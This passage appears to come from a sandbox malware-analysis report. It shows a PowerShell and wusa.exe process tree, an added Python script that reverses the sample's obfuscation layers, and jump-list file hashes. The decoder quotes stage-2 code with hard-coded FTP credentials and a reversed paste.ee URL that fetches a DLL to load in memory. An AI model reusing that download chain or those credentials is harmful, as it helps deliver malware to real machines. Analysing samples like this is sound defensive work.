- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe tkplB /quiet /norestart4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\system32\wusa.exe"C:\Windows\system32\wusa.exe" tkplB /quiet /norestart5⤵
- Drops file in Windows directory
PID:3024
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192
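Worked example (added here; not code from the Triage report or from the sample): a Python re-implementation of the two string-obfuscation layers visible in the process tree above, so the stage-2 script and its indicators can be recovered offline without running the sample. Stage 1 (PID 2344) builds $fvgwr from single-quoted fragments joined with [char]66, applies .replace('уЦϚ','B'), treats the result as Base64 of the UTF-16LE bytes of the reversed stage-2 script, and substitutes the .vbs path for %XRqhI%. Stage 2 (PID 2800) hides the FTP user name and password in -join [char[]](...) arrays, passes the final URL reversed ('0/yvP31/d/ee.etsap//:sptth'), and Base64-decodes the fetched DLL text only after turning '↓:↓' back into 'A'. Two observations on the stage-2 script itself: on this Windows 7 run $host.Version.Major.Equals(2) is true, so only the Google Drive / wusa.exe / reboot branch executed, and the FTP plus in-memory ClassLibrary3.Class1.prFVI branch is what a PowerShell 3+ host would take; and tkplB = ($oGnvr + '\Upwin.msu') lacks the $ sigil, which is why the child at PID 3024 is wusa.exe tkplB /quiet /norestart with the literal string rather than the MSU path. The encode_stage1 helper and the 'TVqQ↓:↓↓:↓==' input exist only to build constructed test data; STAGE2_EXCERPT is copied from the PID 2800 command line.

```python
import base64
import re
from typing import List

# Added example, not code from the Triage report or the sample: re-implements
# the obfuscation layers seen in PIDs 2344 and 2800 so they can be undone offline.

# ---- Layer 1 (PID 2344): 'literal' + [char]66 pieces -> Base64 -> UTF-16LE -> reverse
_PIECE = re.compile(r"'((?:[^']|'')*)'|\[char\](\d+)")


def eval_ps_concat(expr: str) -> str:
    """Evaluate a PowerShell expression made only of 'literal' + [char]N pieces."""
    out = []
    for lit, code in _PIECE.findall(expr):
        out.append(chr(int(code)) if code else lit.replace("''", "'"))
    return "".join(out)


def decode_stage1(expr: str, script_path: str, junk: str = "уЦϚ") -> str:
    """Mirror of: .replace(junk,'B') ; FromBase64String ; Unicode.GetString ;
    [-1..-Length] -join '' ; .replace('%XRqhI%', <path of the .vbs>)."""
    b64 = eval_ps_concat(expr).replace(junk, "B")
    text = base64.b64decode(b64).decode("utf-16-le")
    return text[::-1].replace("%XRqhI%", script_path)


def encode_stage1(script: str) -> str:
    """Inverse of decode_stage1; only used to build a constructed test input in
    the same shape as $fvgwr (every 'B' spliced out as a [char]66 token)."""
    b64 = base64.b64encode(script[::-1].encode("utf-16-le")).decode("ascii")
    pieces = []
    for i, part in enumerate(b64.split("B")):
        if i:
            pieces.append("[char]66")
        pieces.append(f"'{part}'")
    return " + ".join(pieces)


# ---- Layer 2 (PID 2800): strings the sandbox did not resolve for us
_CHAR_ARRAY = re.compile(r"-join\s+\[char\[\]\]\s*\(\s*([\d\s,]+)\)")
_REVERSED_URL = re.compile(r"'([^']*?p?tth)'")   # literal ending in reversed "http"/"https"


def join_char_arrays(ps: str) -> List[str]:
    """Every string built with -join [char[]](n, n, ...), in script order."""
    return ["".join(chr(int(n)) for n in m.group(1).replace(" ", "").split(","))
            for m in _CHAR_ARRAY.finditer(ps)]


def reversed_urls(ps: str) -> List[str]:
    """Literals passed reversed, e.g. '0/yvP31/d/ee.etsap//:sptth'."""
    return [m.group(1)[::-1] for m in _REVERSED_URL.finditer(ps)]


def decode_payload_text(downloaded: str) -> bytes:
    """Mirror of FromBase64String($ydzvq.replace('↓:↓','A')) on the fetched DLL text."""
    return base64.b64decode(downloaded.replace("↓:↓", "A"))


# Excerpts copied from the PID 2800 command line in the report.
STAGE2_EXCERPT = (
    "(New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), "
    "(ConvertTo-SecureString -AsPlainText -Force -String "
    "(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )))));"
    ".Invoke( $null , [object[]] ( '0/yvP31/d/ee.etsap//:sptth' , $sNwoM , 'DDDRegAsm' ) )"
)

if __name__ == "__main__":
    print("ftp credentials:", join_char_arrays(STAGE2_EXCERPT))
    print("final URL:", reversed_urls(STAGE2_EXCERPT))
```

Running the layer-1 decoder over the first fragments of $fvgwr yields the tail of the stage-2 script (the reversed text ends with gAsm' ) );}; , i.e. the 'DDDRegAsm' argument of the Invoke call), which is a quick way to confirm the reversal step before decoding the whole blob.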
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 70f8cdb19d49f253687e4386d1c9c565
  SHA1: 8755635e5e79bed107a234900caf342019a63bee
  SHA256: d50408d77628cd88bc512ff2f31aec895a45f41f7d5af534238049fe82f7bbdc
  SHA512: f32b8cafcad1b15eeca2569e14e089e8d83755d7d1a84670228e1b0e871e5869f1591542bcb93ed3ad58673828531a0abc99452d9c5dabd9af6b40c33eb1c036

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (same jump-list file, second captured version with different content)
  Filesize: 7KB
  MD5: aa4ebbea6f96327bc514c5323a5713ec
  SHA1: abc84b33ea976443704c7434f253e4a848ba0951
  SHA256: 83ac32ca8bcb4e08d881cefdfaf3b7df28245f17af3f71b2811b642bbd6e544d
  SHA512: 59ac5164b627ee23cd988f4f023699ed3f5dda2e14ff0ff50912fc3838a33dc54e89089938e9a9c8a74d0c5eda885404d5e39e2e82541a55b6c96f4bffd4b42c